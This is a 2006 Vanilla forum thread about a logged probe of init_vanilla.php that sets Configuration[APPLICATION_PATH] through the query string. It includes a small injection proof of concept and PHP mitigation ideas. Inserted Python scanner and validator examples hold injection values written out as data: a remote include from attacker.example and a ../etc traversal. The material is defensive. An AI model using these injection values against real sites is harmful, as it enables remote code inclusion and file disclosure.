
Strange request in my log: GET /appg/init_vanilla.php?Configuration[APPLICATION_PATH]=google.com

fmimoso
edited November 2006 in Vanilla 1.0 Help
Found this in my logs (scroll down, formatting gets broken):
88.214.193.xx - - [xx/Nov/2006:xx:x1:57 +0000] "GET /1/ HTTP/1.0" 200 42265 "http://www.google.com/search?q="powered+by+vanilla+1.0.1"&hl=en&lr=&safe=off&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x2:00 +0000] "GET /themes/vanilla/styles/soulscape/vanilla.css HTTP/1.0" 200 29861 "http://mysite.com/1/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x2:06 +0000] "GET /themes/vanilla/styles/soulscape/favicon.ico HTTP/1.0" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x2:09 +0000] "GET /appg/init_vanilla.php?Configuration[APPLICATION_PATH]=google.com HTTP/1.0" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x2:10 +0000] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x4:08 +0000] "GET / HTTP/1.0" 200 62286 "http://www.google.com/search?q="powered+by+vanilla+1.0"&hl=en&lr=&safe=off&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x4:19 +0000] "GET /themes/vanilla/styles/soulscape/favicon.ico HTTP/1.0" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x4:20 +0000] "GET /appg/init_vanilla.php?Configuration[APPLICATION_PATH]=google.com HTTP/1.0" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
Any ideas of what it is?
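As an added example for this thread (not Vanilla's code and not anything a poster wrote), the script below parses Apache "combined" log lines like the ones above and reports every request that tries to set an entry of Vanilla's $Configuration array through the query string. The sample lines are constructed to match the poster's format; the IP address, timestamps and hostnames (203.0.113.7, attacker.example) are placeholders, and the value classification is a heuristic.

```python
"""Scan an Apache access log for requests that try to set entries of Vanilla's
$Configuration array through the query string, as in the thread's log extract.

Added example for this discussion, not code from Vanilla or from any poster.
SAMPLE_LOG is constructed to match the poster's format (Apache "combined");
the IP, dates and hostnames are placeholders."""
import re
from urllib.parse import parse_qsl, urlsplit

# One line of Apache "combined" format. The referer is matched greedily so that
# unescaped quotes inside it (as in the poster's Google referers) do not break
# parsing; the user agent is assumed to contain no double quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>.*)" "(?P<ua>[^"]*)"$'
)

# Query-string names of the form Configuration[SOME_KEY]. Vanilla reads these
# keys from its settings file, never from the request, so any client that
# supplies one is probing whether register_globals will inject it.
CONFIG_PARAM_RE = re.compile(r'^Configuration\[(?P<key>[A-Za-z_]+)\]$')

# Constructed sample lines (placeholder IP 203.0.113.7, RFC 2606 example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Nov/2006:10:01:57 +0000] "GET /1/ HTTP/1.0" 200 42265 '
    '"http://www.google.com/search?q="powered+by+vanilla+1.0.1"&hl=en" "Mozilla/5.0 (constructed)"',
    '203.0.113.7 - - [15/Nov/2006:10:02:00 +0000] "GET /themes/vanilla/styles/soulscape/vanilla.css HTTP/1.0" '
    '200 29861 "http://forum.example/1/" "Mozilla/5.0 (constructed)"',
    '203.0.113.7 - - [15/Nov/2006:10:02:09 +0000] '
    '"GET /appg/init_vanilla.php?Configuration[APPLICATION_PATH]=google.com HTTP/1.0" '
    '403 - "-" "Mozilla/5.0 (constructed)"',
    '203.0.113.7 - - [15/Nov/2006:10:04:20 +0000] '
    '"GET /appg/init_vanilla.php?Configuration[LIBRARY_PATH]=http://attacker.example/lib/ HTTP/1.0" '
    '200 512 "-" "Mozilla/5.0 (constructed)"',
    '203.0.113.7 - - [15/Nov/2006:10:04:31 +0000] '
    '"GET /appg/init_vanilla.php?Configuration[LANGUAGES_PATH]=../../../../etc/ HTTP/1.0" '
    '403 - "-" "Mozilla/5.0 (constructed)"',
]


def parse_line(line):
    """Parse one access-log line; return a dict of fields, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def config_overrides(target):
    """Return {KEY: value} for every Configuration[KEY] parameter in a request target."""
    query = urlsplit(target).query
    found = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        m = CONFIG_PARAM_RE.match(name)
        if m:
            found[m.group('key')] = value
    return found


def classify_value(value):
    """Rough label for what an injected path value points at (heuristic only)."""
    v = value.lower()
    if '://' in v:
        return 'url'          # remote include via http://, ftp:// and similar
    if '..' in v:
        return 'traversal'    # climbing out of the install directory
    if re.match(r'^[a-z0-9-]+(\.[a-z0-9-]+)+', v):
        return 'hostname'     # bare host such as google.com, no scheme
    return 'other'


def scan(lines):
    """Return one finding per injected Configuration key, in log order.

    'served' is True when the script answered 200, i.e. the request reached
    init_vanilla.php instead of being refused by appg/.htaccess (403)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in config_overrides(rec['target']).items():
            findings.append({
                'ip': rec['ip'],
                'time': rec['time'],
                'key': key,
                'value': value,
                'kind': classify_value(value),
                'status': rec['status'],
                'served': rec['status'] == 200,
            })
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        flag = 'INVESTIGATE' if f['served'] else 'blocked'
        print(f"{f['time']} {f['ip']} {f['key']}={f['value']!r} [{f['kind']}] {f['status']} {flag}")
```

A 403 on these requests is the .htaccess doing its job; a 200 means the script ran with the injected parameter and is the line worth following up, together with whatever that IP requested next.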

Comments

  • Not sure. Some of them just look like someone browsing your site (the css/icon requests) - not sure about the odd init_vanilla calls though. Possibly someone trying to fool the software into doing something it's not supposed to, but I wouldn't worry about it too much - as you can see if you try it yourself, it doesn't achieve anything. Has anything gone funky with your forum?
  • edited November 2006
    You can't access these files directly. The request gets a 403 error message because of the .htaccess in appg/:
    <Limit GET POST PUT>
    Order Allow,Deny
    Deny from All
    </Limit>
  • I've tested it and assured it wasn't harmful too, but nevertheless it got me wondering.

    Nothing wrong with the forum so far. And those were the only requests from that IP.

    Someone is trying something, what I don't know. Let this be a warning.
  • It looks like a benign test one would do before injecting some PHP into init_vanilla.php... which could happen on a host that doesn't allow or support .htaccess. (IIS?)
  • @Wall: 'Benign'? Hehe... more like 'failed'.

    @Mimosa: I'd keep tracking my logs if I were you fmim.

    In that context, I highly recommend weblog storming (interactive log analysis)
    I've used it more than once for clients to track and solve hacker attacks and 'benign tests' ;-)
  • The test is benign. After all, Google's homepage isn't exactly malicious code. Had the test succeeded, I am sure the following requests wouldn't have been so benign. Odd the attacker used "powered by vanilla" instead of "vanilla is a product of lussumo". /me goes to set up a honeypot.
  • Mark Vanilla Staff
    Yeah - that's a weird one. I almost want to disable my .htaccess to see what would happen. I don't think it would do much since it would require that safe mode be off. But if the .htaccess was gone and safe mode was off, it might do something weird.
  • If the .htaccess file is disabled and register_globals is on, then it would indeed be possible to set variables which are not defined in that file. For example, with those conditions met, I created a file /random/appg/headers.php which contained the following code:
    <?php echo('<'.'?php'); ?>
    
    echo('HELLO WORLD!!!');
    
    exit();
    
    <?php echo('?>'); ?>
    And here's what happened:


    Again, this would only work in select circumstances, but still, you might want to do something about that, Mark.
  • Mark Vanilla Staff
    I don't know what I could do besides warning people about it.

    Anyone have any suggestions?
  • Wipe out installer/updater files after install?
  • edited November 2006
    How about:
    // !== false matters: strpos() returns 0 (which an if() treats as false) when '://' sits at offset 0
    if ( strpos($Configuration['APPLICATION_PATH'] . $Configuration['LIBRARY_PATH'] . $Configuration['DATABASE_PATH'] . $Configuration['LANGUAGES_PATH'] . $Configuration['LANGUAGE'], '://') !== false ) {
        echo 'Cannot include remote libraries';
        exit;
    }

    EDIT: does not prevent directory traversal or other attacks
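As an added example (not the poster's PHP and not Vanilla's code), here is the same idea written in Python so it runs stand-alone. It implements the '://' test from the post above, handling the offset-0 case that a bare strpos() in an if() misses, and goes beyond it to the stricter check the EDIT asks for: each path setting must be an existing directory under an allow-listed install root, which also rules out directory traversal. The key names are the ones listed in the post; the directory layout, the install root and attacker.example are assumptions.

```python
"""Validate Vanilla-style path settings before they are handed to include().

Added example for this thread, not Vanilla's code and not the poster's PHP.
Key names come from the post above; the directory layout and the hostname
attacker.example are assumed/constructed."""
import os
import tempfile

# Settings that hold filesystem paths. LANGUAGE is a language name rather than
# a path, but the post includes it in the '://' test, so it is kept there.
PATH_KEYS = ('APPLICATION_PATH', 'LIBRARY_PATH', 'DATABASE_PATH', 'LANGUAGES_PATH')
SCHEME_CHECK_KEYS = PATH_KEYS + ('LANGUAGE',)


def contains_remote_scheme(config):
    """The thread's test: any '://' anywhere in the concatenated settings.

    PHP's strpos() returns 0 when the match is at offset 0, which an if()
    treats as false; `in` here (PHP: `!== false`) closes that gap."""
    joined = ''.join(str(config.get(k, '')) for k in SCHEME_CHECK_KEYS)
    return '://' in joined


def resolve_inside(base_dir, value):
    """Return the real path of value if it is an existing directory under base_dir, else None."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, candidate]) != base:
        return None   # '../' escaped the install tree, or an absolute path elsewhere
    if not os.path.isdir(candidate):
        return None   # 'http://host/lib/' collapses to base/http:/host/lib, which does not exist
    return candidate


def validate_paths(config, base_dir):
    """Return (ok, problems); problems is a list of (key, reason) tuples."""
    problems = []
    if contains_remote_scheme(config):
        problems.append(('*', 'remote scheme in path settings'))
    for key in PATH_KEYS:
        value = config.get(key)
        if value is None:
            continue
        if resolve_inside(base_dir, value) is None:
            problems.append((key, 'not an existing directory under the install root'))
    return (not problems, problems)


def demo():
    """Build a throw-away install tree and run the checks over three sample settings."""
    with tempfile.TemporaryDirectory() as base:
        for sub in ('appg', 'library', 'languages'):
            os.mkdir(os.path.join(base, sub))
        good = {'APPLICATION_PATH': 'appg/', 'LIBRARY_PATH': 'library/',
                'LANGUAGES_PATH': 'languages/', 'LANGUAGE': 'English'}
        # Constructed bad values: a remote include and a traversal out of the tree.
        remote = dict(good, LIBRARY_PATH='http://attacker.example/lib/')
        traversal = dict(good, LANGUAGES_PATH='../../../../../../../../etc/')
        return {
            'good': validate_paths(good, base),
            'remote': validate_paths(remote, base),
            'traversal': validate_paths(traversal, base),
        }


if __name__ == '__main__':
    for name, (ok, problems) in demo().items():
        print(name, 'OK' if ok else problems)
```

Checking the resolved location rather than scanning the string is what makes the traversal case fail as well: whatever the setting looks like, it is only accepted if it lands on a directory that already exists inside the install root.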
  • Shouldn't register_globals ALWAYS be off? If the user has it on, then it's his/her problem. You cannot leave a door open and then find a way to put barbed wire in front of it. Why not keep the door closed?
  • What I've seen several other applications do, Mark, is have a (special) definition somewhere in the settings file, then check to make sure it's defined before continuing. So if you had something like
    define('IN_VANILLA', 1);
    in your settings file, then this would be the first line in files like init_vanilla.php:
    if (!defined('IN_VANILLA')) exit();
  • This came to me in a dream: include_once('settings.php');

    The idea is that if settings is already included, the statement is ignored. If it is not, then it gets included and initializes the paths. Other functions that might be useful are get_included_files() and function_exists().